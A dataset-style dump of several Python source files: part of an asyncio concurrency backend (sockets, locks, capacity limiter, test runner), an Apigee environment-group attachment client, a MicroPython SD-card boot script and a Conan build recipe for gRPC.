    read_queue: Deque[Tuple[bytes, IPSockAddrType]]
    read_event: asyncio.Event
    write_event: asyncio.Event
    # Set by error_received(); checked by socket factories/receivers.
    exception: Optional[Exception] = None
    def connection_made(self, transport: asyncio.BaseTransport) -> None:
        self.read_queue = deque(maxlen=100)  # arbitrary value
        self.read_event = asyncio.Event()
        self.write_event = asyncio.Event()
        self.write_event.set()
    def connection_lost(self, exc: Optional[Exception]) -> None:
        # Wake pending waiters; note the exception is not stored here.
        self.read_event.set()
        self.write_event.set()
    def datagram_received(self, data: bytes, addr: IPSockAddrType) -> None:
        addr = convert_ipv6_sockaddr(addr)
        self.read_queue.append((data, addr))
        self.read_event.set()
    def error_received(self, exc: Exception) -> None:
        self.exception = exc
    def pause_writing(self) -> None:
        self.write_event.clear()
    def resume_writing(self) -> None:
        self.write_event.set()
class SocketStream(abc.SocketStream):
    """Byte stream over a TCP/UNIX transport with on-demand read flow control.

    The transport starts paused; receive() resumes reading only while waiting
    for data, keeping the internal read queue bounded.
    """
    def __init__(self, transport: asyncio.Transport, protocol: StreamProtocol):
        self._transport = transport
        self._protocol = protocol
        # Guards enforce one reader/one writer task at a time.
        self._receive_guard = ResourceGuard('reading from')
        self._send_guard = ResourceGuard('writing to')
        self._closed = False
    async def receive(self, max_bytes: int = 65536) -> bytes:
        """Return up to max_bytes; raise EndOfStream on orderly EOF."""
        with self._receive_guard:
            await checkpoint()
            if not self._protocol.read_queue and not self._transport.is_closing():
                # Resume reading just long enough to get one event's worth.
                self._protocol.read_event.clear()
                self._transport.resume_reading()
                await self._protocol.read_event.wait()
                self._transport.pause_reading()
            try:
                chunk = self._protocol.read_queue.popleft()
            except IndexError:
                # Empty queue after wake-up: closed locally, broken, or EOF.
                if self._closed:
                    raise ClosedResourceError from None
                elif self._protocol.exception:
                    raise BrokenResourceError from self._protocol.exception
                else:
                    raise EndOfStream
            if len(chunk) > max_bytes:
                # Split the oversized chunk
                chunk, leftover = chunk[:max_bytes], chunk[max_bytes:]
                self._protocol.read_queue.appendleft(leftover)
            return chunk
    async def send(self, item: bytes) -> None:
        """Write item to the transport, honoring write-side flow control."""
        with self._send_guard:
            await checkpoint()
            try:
                self._transport.write(item)
            except RuntimeError as exc:
                if self._closed:
                    raise ClosedResourceError from None
                elif self._transport.is_closing():
                    raise BrokenResourceError from exc
                else:
                    raise
            # Blocks while the transport has paused writing (buffer full).
            await self._protocol.write_event.wait()
    async def send_eof(self) -> None:
        try:
            self._transport.write_eof()
        except OSError:
            pass
    async def aclose(self) -> None:
        # Attempt a graceful shutdown (EOF + close), then abort to be sure.
        if not self._transport.is_closing():
            self._closed = True
            try:
                self._transport.write_eof()
            except OSError:
                pass
            self._transport.close()
            await asyncio.sleep(0)
            self._transport.abort()
    @property
    def raw_socket(self) -> socket.socket:
        return self._transport.get_extra_info('socket')
class SocketListener(abc.SocketListener):
    """Accepts inbound connections on a pre-bound, listening raw socket."""
    def __init__(self, raw_socket: socket.SocketType):
        self._raw_socket = raw_socket
        self._loop = cast(asyncio.BaseEventLoop, get_running_loop())
        # Only one task may be blocked in accept() at a time.
        self._accept_guard = ResourceGuard('accepting connections from')
    @property
    def raw_socket(self) -> socket.socket:
        return self._raw_socket
    async def accept(self) -> abc.SocketStream:
        """Wait for one connection and wrap it in a SocketStream."""
        with self._accept_guard:
            await checkpoint()
            try:
                client_sock, _addr = await self._loop.sock_accept(self._raw_socket)
            except asyncio.CancelledError:
                # Workaround for https://bugs.python.org/issue41317
                try:
                    self._loop.remove_reader(self._raw_socket)
                except NotImplementedError:
                    pass
                raise
        # Disable Nagle's algorithm on TCP sockets.
        if client_sock.family in (socket.AF_INET, socket.AF_INET6):
            client_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        transport, protocol = await self._loop.connect_accepted_socket(StreamProtocol, client_sock)
        return SocketStream(cast(asyncio.Transport, transport), cast(StreamProtocol, protocol))
    async def aclose(self) -> None:
        self._raw_socket.close()
class UDPSocket(abc.UDPSocket):
    """Unconnected UDP socket: receives (data, addr) pairs, sends to any addr."""
    def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
        self._transport = transport
        self._protocol = protocol
        # Guards enforce one receiving/one sending task at a time.
        self._receive_guard = ResourceGuard('reading from')
        self._send_guard = ResourceGuard('writing to')
        self._closed = False
    async def aclose(self) -> None:
        if not self._transport.is_closing():
            self._closed = True
            self._transport.close()
    @property
    def raw_socket(self) -> socket.socket:
        return self._transport.get_extra_info('socket')
    async def receive(self) -> Tuple[bytes, IPSockAddrType]:
        """Return the next (payload, sender address) pair."""
        with self._receive_guard:
            await checkpoint()
            # If the buffer is empty, ask for more data
            if not self._protocol.read_queue and not self._transport.is_closing():
                self._protocol.read_event.clear()
                await self._protocol.read_event.wait()
            try:
                return self._protocol.read_queue.popleft()
            except IndexError:
                # Queue still empty after wake-up: the socket went away.
                if self._closed:
                    raise ClosedResourceError from None
                else:
                    raise BrokenResourceError from None
    async def send(self, item: UDPPacketType) -> None:
        """Send one (payload, address) datagram."""
        with self._send_guard:
            await checkpoint()
            await self._protocol.write_event.wait()
            if self._closed:
                raise ClosedResourceError
            elif self._transport.is_closing():
                raise BrokenResourceError
            else:
                self._transport.sendto(*item)
class ConnectedUDPSocket(abc.ConnectedUDPSocket):
    """UDP socket bound to one remote peer: payload-only receive/send."""
    def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
        self._transport = transport
        self._protocol = protocol
        # Guards enforce one receiving/one sending task at a time.
        self._receive_guard = ResourceGuard('reading from')
        self._send_guard = ResourceGuard('writing to')
        self._closed = False
    async def aclose(self) -> None:
        if not self._transport.is_closing():
            self._closed = True
            self._transport.close()
    @property
    def raw_socket(self) -> SocketType:
        return self._transport.get_extra_info('socket')
    async def receive(self) -> bytes:
        """Return the next datagram payload from the connected peer."""
        with self._receive_guard:
            await checkpoint()
            # If the buffer is empty, ask for more data
            if not self._protocol.read_queue and not self._transport.is_closing():
                self._protocol.read_event.clear()
                await self._protocol.read_event.wait()
            try:
                packet = self._protocol.read_queue.popleft()
            except IndexError:
                # Queue still empty after wake-up: the socket went away.
                if self._closed:
                    raise ClosedResourceError from None
                else:
                    raise BrokenResourceError from None
            # Drop the sender address; the socket is connected to one peer.
            return packet[0]
    async def send(self, item: bytes) -> None:
        """Send one datagram to the connected peer."""
        with self._send_guard:
            await checkpoint()
            await self._protocol.write_event.wait()
            if self._closed:
                raise ClosedResourceError
            elif self._transport.is_closing():
                raise BrokenResourceError
            else:
                self._transport.sendto(item)
async def connect_tcp(host: str, port: int,
                      local_addr: Optional[Tuple[str, int]] = None) -> SocketStream:
    """Establish a TCP connection and wrap it in a SocketStream."""
    loop = get_running_loop()
    result = await loop.create_connection(StreamProtocol, host, port, local_addr=local_addr)
    transport, protocol = cast(Tuple[asyncio.Transport, StreamProtocol], result)
    # Start with reading paused; SocketStream.receive() resumes it on demand.
    transport.pause_reading()
    return SocketStream(transport, protocol)
async def connect_unix(path: str) -> SocketStream:
    """Open a UNIX domain stream connection and wrap it in a SocketStream."""
    loop = get_running_loop()
    result = await loop.create_unix_connection(StreamProtocol, path)
    transport, protocol = cast(Tuple[asyncio.Transport, StreamProtocol], result)
    # Start with reading paused; SocketStream.receive() resumes it on demand.
    transport.pause_reading()
    return SocketStream(transport, protocol)
async def create_udp_socket(
    family: socket.AddressFamily,
    local_address: Optional[IPSockAddrType],
    remote_address: Optional[IPSockAddrType],
    reuse_port: bool
) -> Union[UDPSocket, ConnectedUDPSocket]:
    """Create a UDP endpoint; connected when a remote address is given."""
    result = await get_running_loop().create_datagram_endpoint(
        DatagramProtocol, local_addr=local_address, remote_addr=remote_address, family=family,
        reuse_port=reuse_port)
    transport = cast(asyncio.DatagramTransport, result[0])
    protocol = cast(DatagramProtocol, result[1])
    if protocol.exception:
        # Endpoint setup failed asynchronously; clean up and surface it.
        transport.close()
        raise protocol.exception
    if not remote_address:
        return UDPSocket(transport, protocol)
    else:
        return ConnectedUDPSocket(transport, protocol)
async def getaddrinfo(host: Union[bytearray, bytes, str], port: Union[str, int, None], *,
                      family: Union[int, AddressFamily] = 0, type: Union[int, SocketKind] = 0,
                      proto: int = 0, flags: int = 0) -> GetAddrInfoReturnType:
    """Async wrapper around the event loop's getaddrinfo()."""
    # https://github.com/python/typeshed/pull/4304
    result = await get_running_loop().getaddrinfo(
        host, port, family=family, type=type, proto=proto, flags=flags)  # type: ignore[arg-type]
    return cast(GetAddrInfoReturnType, result)
async def getnameinfo(sockaddr: IPSockAddrType, flags: int = 0) -> Tuple[str, str]:
    """Resolve a socket address to a (host, service) pair."""
    # https://github.com/python/typeshed/pull/4305
    loop = get_running_loop()
    host_service = await loop.getnameinfo(sockaddr, flags)
    return cast(Tuple[str, str], host_service)
async def wait_socket_readable(sock: socket.SocketType) -> None:
    """Suspend until *sock* has data available to read.

    :raises BusyResourceError: if another task is already waiting to read
    :raises ClosedResourceError: if the wait was aborted externally (the
        event entry was removed from ``_read_events``)
    """
    await checkpoint()
    if _read_events.get(sock):
        raise BusyResourceError('reading from') from None

    loop = get_running_loop()
    event = _read_events[sock] = asyncio.Event()
    # Consistency fix: reuse the loop captured above instead of calling
    # get_running_loop() a second time (the removal path already uses `loop`).
    loop.add_reader(sock, event.set)
    try:
        await event.wait()
    finally:
        # If our entry is still registered, we own the reader and must remove it;
        # a missing entry means the wait was aborted from outside.
        if _read_events.pop(sock, None) is not None:
            loop.remove_reader(sock)
            readable = True
        else:
            readable = False

    if not readable:
        raise ClosedResourceError
async def wait_socket_writable(sock: socket.SocketType) -> None:
    """Suspend until *sock* is ready for writing.

    :raises BusyResourceError: if another task is already waiting to write
    :raises ClosedResourceError: if the wait was aborted externally (the
        event entry was removed from ``_write_events``)
    """
    await checkpoint()
    if _write_events.get(sock):
        raise BusyResourceError('writing to') from None

    loop = get_running_loop()
    event = _write_events[sock] = asyncio.Event()
    # Consistency fix: register with the socket object itself (asyncio accepts
    # anything with a fileno()) so the add/remove keys match, mirroring
    # wait_socket_readable(); previously this added by sock.fileno() but
    # removed by sock.
    loop.add_writer(sock, event.set)
    try:
        await event.wait()
    finally:
        # If our entry is still registered, we own the writer and must remove it;
        # a missing entry means the wait was aborted from outside.
        if _write_events.pop(sock, None) is not None:
            loop.remove_writer(sock)
            writable = True
        else:
            writable = False

    if not writable:
        raise ClosedResourceError
#
# Synchronization
#
class Lock(abc.Lock):
    """Thin wrapper over asyncio.Lock that checkpoints before acquiring."""
    def __init__(self):
        self._lock = asyncio.Lock()
    def locked(self) -> bool:
        return self._lock.locked()
    async def acquire(self) -> None:
        # Checkpoint first so acquisition is always a cancellation point.
        await checkpoint()
        await self._lock.acquire()
    async def release(self) -> None:
        self._lock.release()
class Condition(abc.Condition):
    """Thin wrapper over asyncio.Condition, optionally sharing an anyio Lock."""
    def __init__(self, lock: Optional[Lock]):
        # Unwrap the anyio Lock to its underlying asyncio.Lock, if given.
        asyncio_lock = lock._lock if lock else None
        self._condition = asyncio.Condition(asyncio_lock)
    async def acquire(self) -> None:
        await checkpoint()
        await self._condition.acquire()
    async def release(self) -> None:
        self._condition.release()
    def locked(self) -> bool:
        return self._condition.locked()
    async def notify(self, n=1):
        self._condition.notify(n)
    async def notify_all(self):
        self._condition.notify_all()
    async def wait(self):
        await checkpoint()
        return await self._condition.wait()
class Event(abc.Event):
    """Thin wrapper over asyncio.Event with an async set() per the abc API."""
    def __init__(self):
        self._event = asyncio.Event()
    async def set(self):
        self._event.set()
    def is_set(self) -> bool:
        return self._event.is_set()
    async def wait(self):
        await checkpoint()
        await self._event.wait()
class Semaphore(abc.Semaphore):
    """Thin wrapper over asyncio.Semaphore."""
    def __init__(self, value: int):
        self._semaphore = asyncio.Semaphore(value)
    async def acquire(self) -> None:
        await checkpoint()
        await self._semaphore.acquire()
    async def release(self) -> None:
        self._semaphore.release()
    @property
    def value(self):
        # asyncio.Semaphore exposes no public counter; read the private one.
        return self._semaphore._value
class CapacityLimiter(abc.CapacityLimiter):
    """Limits concurrent borrowers to ``total_tokens``.

    Waiters are queued in an OrderedDict and woken oldest-first so that
    acquisition is fair (FIFO).
    """
    def __init__(self, total_tokens: float):
        self._set_total_tokens(total_tokens)
        self._borrowers: Set[Any] = set()
        self._wait_queue: Dict[Any, asyncio.Event] = OrderedDict()
    async def __aenter__(self):
        await self.acquire()
    async def __aexit__(self, exc_type: Optional[Type[BaseException]],
                        exc_val: Optional[BaseException],
                        exc_tb: Optional[TracebackType]) -> None:
        await self.release()
    def _set_total_tokens(self, value: float) -> None:
        # Only ints or math.inf are accepted, and at least one token.
        if not isinstance(value, int) and not math.isinf(value):
            raise TypeError('total_tokens must be an int or math.inf')
        if value < 1:
            raise ValueError('total_tokens must be >= 1')
        self._total_tokens = value
    @property
    def total_tokens(self) -> float:
        return self._total_tokens
    async def set_total_tokens(self, value: float) -> None:
        """Change the token count, waking queued waiters if capacity grew."""
        old_value = self._total_tokens
        self._set_total_tokens(value)
        events = []
        # Wake one queued waiter per newly added token, in queue order.
        for event in self._wait_queue.values():
            if value <= old_value:
                break
            if not event.is_set():
                events.append(event)
                old_value += 1
        for event in events:
            event.set()
    @property
    def borrowed_tokens(self) -> int:
        return len(self._borrowers)
    @property
    def available_tokens(self) -> float:
        return self._total_tokens - len(self._borrowers)
    async def acquire_nowait(self) -> None:
        await self.acquire_on_behalf_of_nowait(current_task())
    async def acquire_on_behalf_of_nowait(self, borrower) -> None:
        if borrower in self._borrowers:
            raise RuntimeError("this borrower is already holding one of this CapacityLimiter's "
                               "tokens")
        # Refuse even if capacity exists while others are queued (fairness).
        if self._wait_queue or len(self._borrowers) >= self._total_tokens:
            raise WouldBlock
        self._borrowers.add(borrower)
    async def acquire(self) -> None:
        return await self.acquire_on_behalf_of(current_task())
    async def acquire_on_behalf_of(self, borrower) -> None:
        try:
            await self.acquire_on_behalf_of_nowait(borrower)
        except WouldBlock:
            # Queue up and wait to be woken by a release or token increase.
            event = asyncio.Event()
            self._wait_queue[borrower] = event
            try:
                await event.wait()
            except BaseException:
                self._wait_queue.pop(borrower, None)
                raise
            self._borrowers.add(borrower)
    async def release(self) -> None:
        await self.release_on_behalf_of(current_task())
    async def release_on_behalf_of(self, borrower) -> None:
        try:
            self._borrowers.remove(borrower)
        except KeyError:
            raise RuntimeError("this borrower isn't holding any of this CapacityLimiter's "
                               "tokens") from None
        # Notify the next task in line if this limiter has free capacity now.
        # Bug fix: popitem() pops the most recently queued waiter (LIFO);
        # popitem(last=False) wakes the oldest waiter, matching the FIFO
        # intent stated above.
        if self._wait_queue and len(self._borrowers) < self._total_tokens:
            event = self._wait_queue.popitem(last=False)[1]
            event.set()
def current_default_thread_limiter():
    """Return the limiter capping concurrent worker threads."""
    return _default_thread_limiter
# Module-wide default: at most 40 concurrent worker threads.
_default_thread_limiter = CapacityLimiter(40)
#
# Operating system signals
#
@asynccontextmanager
async def open_signal_receiver(*signals: int):
    """Yield an async generator that produces received signal numbers.

    Handlers are installed for each requested signal on entry and always
    removed on exit.
    """
    async def process_signal_queue():
        while True:
            signum = await queue.get()
            yield signum

    loop = get_running_loop()
    queue = asyncio.Queue()  # type: asyncio.Queue[int]
    handled_signals = set()
    agen = process_signal_queue()
    try:
        # Register each distinct signal; the handler just enqueues the number.
        for sig in set(signals):
            loop.add_signal_handler(sig, queue.put_nowait, sig)
            handled_signals.add(sig)

        yield agen
    finally:
        # Close the generator first, then unregister every installed handler.
        await agen.aclose()
        for sig in handled_signals:
            loop.remove_signal_handler(sig)
#
# Testing and debugging
#
def _create_task_info(task: asyncio.Task) -> TaskInfo:
    """Build a TaskInfo for *task*, preferring anyio-tracked state if present."""
    task_state = _task_states.get(task)
    if task_state is None:
        # Untracked task: fall back to the native name where supported.
        name = task.get_name() if _native_task_names else None  # type: ignore
        parent_id = None
    else:
        name = task_state.name
        parent_id = task_state.parent_id

    return TaskInfo(id(task), parent_id, name, task._coro)  # type: ignore
async def get_current_task() -> TaskInfo:
    """Return TaskInfo for the currently running task."""
    return _create_task_info(current_task())  # type: ignore
async def get_running_tasks() -> List[TaskInfo]:
    """Return TaskInfo for every task that has not yet completed."""
    return [_create_task_info(task) for task in all_tasks() if not task.done()]
async def wait_all_tasks_blocked() -> None:
    """Poll until every other task is blocked on something other than sleep(0).

    Inspects each task's coroutine chain via private attributes; used by the
    test support machinery.
    """
    this_task = current_task()
    while True:
        for task in all_tasks():
            if task is this_task:
                continue

            # Follow the await chain down from the task's top-level coroutine.
            if isgenerator(task._coro):  # type: ignore
                awaitable = task._coro.gi_yieldfrom  # type: ignore
            else:
                awaitable = task._coro.cr_await  # type: ignore

            # If the first awaitable is None, the task has not started running yet
            task_running = bool(awaitable)

            # Consider any task doing sleep(0) as not being blocked
            while asyncio.iscoroutine(awaitable):
                if isgenerator(awaitable):
                    code = awaitable.gi_code
                    f_locals = awaitable.gi_frame.f_locals
                    awaitable = awaitable.gi_yieldfrom
                else:
                    code = awaitable.cr_code
                    f_locals = awaitable.cr_frame.f_locals
                    awaitable = awaitable.cr_await

                if code is asyncio.sleep.__code__ and f_locals['delay'] == 0:
                    task_running = False
                    break

            if not task_running:
                # Some task is not genuinely blocked yet; back off and re-check.
                await sleep(0.1)
                break
        else:
            return
class TestRunner(abc.TestRunner):
    """Owns a private event loop for driving coroutine-based tests."""
    def __init__(self, debug: bool = False, use_uvloop: bool = True,
                 policy: Optional[asyncio.AbstractEventLoopPolicy] = None):
        _maybe_set_event_loop_policy(policy, use_uvloop)
        self._loop = asyncio.new_event_loop()
        self._loop.set_debug(debug)
        asyncio.set_event_loop(self._loop)
    def _cancel_all_tasks(self):
        # Cancel everything still pending, wait for them, then re-raise any
        # non-cancellation failure.
        to_cancel = all_tasks(self._loop)
        if not to_cancel:
            return

        for task in to_cancel:
            task.cancel()

        # NOTE(review): the explicit loop= argument to asyncio.gather() was
        # removed in Python 3.10; this code targets older interpreters.
        self._loop.run_until_complete(
            asyncio.gather(*to_cancel, loop=self._loop, return_exceptions=True))

        for task in to_cancel:
            if task.cancelled():
                continue
            if task.exception() is not None:
                raise task.exception()
    def close(self) -> None:
        try:
            self._cancel_all_tasks()
            self._loop.run_until_complete(self._loop.shutdown_asyncgens())
        finally:
            asyncio.set_event_loop(None)
            self._loop.close()
    def call(self, func: Callable[..., Awaitable], *args, **kwargs):
        # Drive a single coroutine to completion on the private loop.
        return self._loop.run_until_complete(func(*args, **kwargs))
| 32.454476 | 99 | 0.627002 |
acfb4ff0785bdc8c4f903862652ff0f70232ad27 | 4,277 | py | Python | python/services/apigee/environment_group_attachment.py | trodge/declarative-resource-client-library | 2cb7718a5074776b3113cc18a7483b54022238f3 | [
"Apache-2.0"
] | null | null | null | python/services/apigee/environment_group_attachment.py | trodge/declarative-resource-client-library | 2cb7718a5074776b3113cc18a7483b54022238f3 | [
"Apache-2.0"
] | null | null | null | python/services/apigee/environment_group_attachment.py | trodge/declarative-resource-client-library | 2cb7718a5074776b3113cc18a7483b54022238f3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from connector import channel
from google3.cloud.graphite.mmv2.services.google.apigee import (
environment_group_attachment_pb2,
)
from google3.cloud.graphite.mmv2.services.google.apigee import (
environment_group_attachment_pb2_grpc,
)
from typing import List
class EnvironmentGroupAttachment(object):
    """DCL client for an Apigee environment-group attachment resource.

    Wraps the generated gRPC service stubs with apply/delete/list operations
    and proto conversion.
    """
    def __init__(
        self,
        name: str = None,
        environment: str = None,
        created_at: int = None,
        envgroup: str = None,
        service_account_file: str = "",
    ):
        channel.initialize()
        self.name = name
        self.environment = environment
        # NOTE(review): `created_at` is accepted but never stored here; it is
        # only populated from the server response in apply().  Presumably an
        # output-only field -- confirm against the code generator's conventions.
        self.envgroup = envgroup
        self.service_account_file = service_account_file

    def apply(self):
        """Create or update the attachment; refreshes fields from the response."""
        stub = environment_group_attachment_pb2_grpc.ApigeeEnvironmentGroupAttachmentServiceStub(
            channel.Channel()
        )
        request = (
            environment_group_attachment_pb2.ApplyApigeeEnvironmentGroupAttachmentRequest()
        )
        if Primitive.to_proto(self.name):
            request.resource.name = Primitive.to_proto(self.name)

        if Primitive.to_proto(self.environment):
            request.resource.environment = Primitive.to_proto(self.environment)

        if Primitive.to_proto(self.envgroup):
            request.resource.envgroup = Primitive.to_proto(self.envgroup)

        request.service_account_file = self.service_account_file

        response = stub.ApplyApigeeEnvironmentGroupAttachment(request)
        self.name = Primitive.from_proto(response.name)
        self.environment = Primitive.from_proto(response.environment)
        self.created_at = Primitive.from_proto(response.created_at)
        self.envgroup = Primitive.from_proto(response.envgroup)

    def delete(self):
        """Delete the attachment identified by this object's fields."""
        stub = environment_group_attachment_pb2_grpc.ApigeeEnvironmentGroupAttachmentServiceStub(
            channel.Channel()
        )
        request = (
            environment_group_attachment_pb2.DeleteApigeeEnvironmentGroupAttachmentRequest()
        )
        request.service_account_file = self.service_account_file
        if Primitive.to_proto(self.name):
            request.resource.name = Primitive.to_proto(self.name)

        if Primitive.to_proto(self.environment):
            request.resource.environment = Primitive.to_proto(self.environment)

        if Primitive.to_proto(self.envgroup):
            request.resource.envgroup = Primitive.to_proto(self.envgroup)

        response = stub.DeleteApigeeEnvironmentGroupAttachment(request)

    @classmethod
    def list(self, envgroup, service_account_file=""):
        """List attachments under the given environment group."""
        stub = environment_group_attachment_pb2_grpc.ApigeeEnvironmentGroupAttachmentServiceStub(
            channel.Channel()
        )
        request = (
            environment_group_attachment_pb2.ListApigeeEnvironmentGroupAttachmentRequest()
        )
        request.service_account_file = service_account_file
        request.Envgroup = envgroup

        return stub.ListApigeeEnvironmentGroupAttachment(request).items

    def to_proto(self):
        """Convert this object to its proto resource message."""
        resource = environment_group_attachment_pb2.ApigeeEnvironmentGroupAttachment()
        if Primitive.to_proto(self.name):
            resource.name = Primitive.to_proto(self.name)
        if Primitive.to_proto(self.environment):
            resource.environment = Primitive.to_proto(self.environment)
        if Primitive.to_proto(self.envgroup):
            resource.envgroup = Primitive.to_proto(self.envgroup)
        return resource
class Primitive(object):
    """Helpers for converting scalar values to and from proto fields."""

    @classmethod
    def to_proto(self, s):
        # Proto3 scalar string fields cannot be unset: map falsy values to "".
        return s if s else ""

    @classmethod
    def from_proto(self, s):
        # Scalars come back from proto unchanged.
        return s
| 36.245763 | 97 | 0.702361 |
acfb5027851f6eaa4d61c01bd692b7d372ecabf0 | 574 | py | Python | image/boot.py | ssube/redesigned-barnacle | 314ea415b6f725c798cc97d6e619fbedc7f8bd21 | [
"MIT"
] | null | null | null | image/boot.py | ssube/redesigned-barnacle | 314ea415b6f725c798cc97d6e619fbedc7f8bd21 | [
"MIT"
] | 1 | 2021-11-04T16:00:15.000Z | 2021-11-04T16:00:15.000Z | image/boot.py | ssube/redesigned-barnacle | 314ea415b6f725c798cc97d6e619fbedc7f8bd21 | [
"MIT"
] | null | null | null | import machine
import os
import sys
def boot_main():
    """MicroPython boot entry: mount the SD card, load config, chain-load the app."""
    # load config
    card = machine.SDCard()
    os.mount(card, '/card')
    # Make card-resident libraries importable before loading project modules.
    sys.path.append('/card/lib')
    from redesigned_barnacle.config import load_config
    from redesigned_barnacle.ota import chain_load
    config = load_config('/card', 'config.yml')
    print('Card config: ', config)
    # chain the card loader
    chain_module = chain_load(config['image_name'], [
        '/card/lib',
        '/card/app',
    ])
    return chain_module.chain_main(config)
# Run the boot sequence when executed directly as the boot script.
if __name__ == "__main__":
    boot_main()
| 19.793103 | 54 | 0.651568 |
acfb515a201beda76370bff8c92f8eb47738f999 | 6,165 | py | Python | conanfile.py | sdmg15/conan-grpc | ccf66a286f9f577638c0e95525f6a302ca1114ec | [
"MIT"
] | 2 | 2020-02-28T01:10:58.000Z | 2020-04-07T08:13:35.000Z | conanfile.py | sdmg15/conan-grpc | ccf66a286f9f577638c0e95525f6a302ca1114ec | [
"MIT"
] | null | null | null | conanfile.py | sdmg15/conan-grpc | ccf66a286f9f577638c0e95525f6a302ca1114ec | [
"MIT"
] | 4 | 2020-02-16T14:08:33.000Z | 2020-07-13T03:39:20.000Z | from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
import os
class grpcConan(ConanFile):
    """Conan recipe building gRPC 1.26 against conan-provided dependencies."""
    name = "grpc"
    version = "1.26.0"
    description = "Google's RPC library and framework."
    topics = ("conan", "grpc", "rpc")
    url = "https://github.com/inexorgame/conan-grpc"
    homepage = "https://github.com/grpc/grpc"
    license = "Apache-2.0"
    exports_sources = ["CMakeLists.txt"]
    generators = "cmake", "cmake_find_package_multi"
    short_paths = True
    settings = "os", "arch", "compiler", "build_type"
    options = {
        # "shared": [True, False],
        "fPIC": [True, False],
        "build_codegen": [True, False],
        "build_csharp_ext": [True, False]
    }
    default_options = {
        "fPIC": True,
        "build_codegen": True,
        "build_csharp_ext": False
    }
    _source_subfolder = "source_subfolder"
    _build_subfolder = "build_subfolder"
    requires = (
        "zlib/1.2.11",
        "openssl/1.1.1d",
        "protobuf/3.9.1@bincrafters/stable",
        "protoc_installer/3.9.1@bincrafters/stable",
        "c-ares/1.15.0"
    )

    def configure(self):
        if self.settings.os == "Windows" and self.settings.compiler == "Visual Studio":
            del self.options.fPIC
            # Bug fix: this version check previously ran for every compiler,
            # so e.g. GCC 9 (version "9" < 14) was rejected with a Visual
            # Studio error message.  Only MSVC versions are meaningfully
            # compared against 14 (= VS 2015).
            compiler_version = tools.Version(self.settings.compiler.version)
            if compiler_version < 14:
                raise ConanInvalidConfiguration("gRPC can only be built with Visual Studio 2015 or higher.")

    def source(self):
        """Fetch the sources and patch them to use conan dependencies."""
        tools.get(**self.conan_data["sources"][self.version])
        extracted_dir = self.name + "-" + self.version
        os.rename(extracted_dir, self._source_subfolder)

        cmake_path = os.path.join(self._source_subfolder, "CMakeLists.txt")
        # See #5
        tools.replace_in_file(cmake_path, "_gRPC_PROTOBUF_LIBRARIES", "CONAN_LIBS_PROTOBUF")
        # See https://github.com/grpc/grpc/issues/21293 - OpenSSL 1.1.1+ doesn't work without
        tools.replace_in_file(
            cmake_path, "set(_gRPC_BASELIB_LIBRARIES wsock32 ws2_32)", "set(_gRPC_BASELIB_LIBRARIES wsock32 ws2_32 crypt32)")
        # cmake_find_package_multi is producing a c-ares::c-ares target, grpc is looking for c-ares::cares
        tools.replace_in_file(
            os.path.join(self._source_subfolder, "cmake", "cares.cmake"), "c-ares::cares", "c-ares::c-ares")

        # Parts which should be options:
        # grpc_cronet
        # grpc++_cronet
        # grpc_unsecure (?)
        # grpc++_unsecure (?)
        # grpc++_reflection
        # gen_hpack_tables (?)
        # gen_legal_metadata_characters (?)
        # grpc_csharp_plugin
        # grpc_node_plugin
        # grpc_objective_c_plugin
        # grpc_php_plugin
        # grpc_python_plugin
        # grpc_ruby_plugin

    def _configure_cmake(self):
        cmake = CMake(self)

        # This doesn't work yet as one would expect, because the install target builds everything
        # and we need the install target because of the generated CMake files
        #
        # enable_mobile=False # Enables iOS and Android support
        # non_cpp_plugins=False # Enables plugins such as --java-out and --py-out (if False, only --cpp-out is possible)
        #
        # cmake.definitions['CONAN_ADDITIONAL_PLUGINS'] = "ON" if self.options.build_csharp_ext else "OFF"
        #
        # Doesn't work yet for the same reason as above
        #
        # cmake.definitions['CONAN_ENABLE_MOBILE'] = "ON" if self.options.build_csharp_ext else "OFF"

        cmake.definitions['gRPC_BUILD_CODEGEN'] = "ON" if self.options.build_codegen else "OFF"
        cmake.definitions['gRPC_BUILD_CSHARP_EXT'] = "ON" if self.options.build_csharp_ext else "OFF"
        cmake.definitions['gRPC_BUILD_TESTS'] = "OFF"

        # We need the generated cmake/ files (bc they depend on the list of targets, which is dynamic)
        cmake.definitions['gRPC_INSTALL'] = "ON"
        # cmake.definitions['CMAKE_INSTALL_PREFIX'] = self._build_subfolder

        # tell grpc to use the find_package versions
        cmake.definitions['gRPC_CARES_PROVIDER'] = "package"
        cmake.definitions['gRPC_ZLIB_PROVIDER'] = "package"
        cmake.definitions['gRPC_SSL_PROVIDER'] = "package"
        cmake.definitions['gRPC_PROTOBUF_PROVIDER'] = "package"

        # Compilation on minGW GCC requires to set _WIN32_WINNTT to at least 0x600
        # https://github.com/grpc/grpc/blob/109c570727c3089fef655edcdd0dd02cc5958010/include/grpc/impl/codegen/port_platform.h#L44
        if self.settings.os == "Windows" and self.settings.compiler == "gcc":
            cmake.definitions["CMAKE_CXX_FLAGS"] = "-D_WIN32_WINNT=0x600"
            cmake.definitions["CMAKE_C_FLAGS"] = "-D_WIN32_WINNT=0x600"

        cmake.configure(build_folder=self._build_subfolder)
        return cmake

    def build(self):
        cmake = self._configure_cmake()
        cmake.build()

    def package(self):
        """Install build products and copy headers/libs/binaries into the package."""
        cmake = self._configure_cmake()
        cmake.install()
        self.copy(pattern="LICENSE", dst="licenses")
        self.copy('*', dst='include', src='{}/include'.format(self._source_subfolder))
        self.copy('*.cmake', dst='lib', src='{}/lib'.format(self._build_subfolder), keep_path=True)
        self.copy("*.lib", dst="lib", src="", keep_path=False)
        self.copy("*.a", dst="lib", src="", keep_path=False)
        self.copy("*", dst="bin", src="bin")
        self.copy("*.dll", dst="bin", keep_path=False)
        self.copy("*.so", dst="lib", keep_path=False)

    def package_info(self):
        self.env_info.PATH.append(os.path.join(self.package_folder, "bin"))
        # Link order matters: dependents before dependencies.
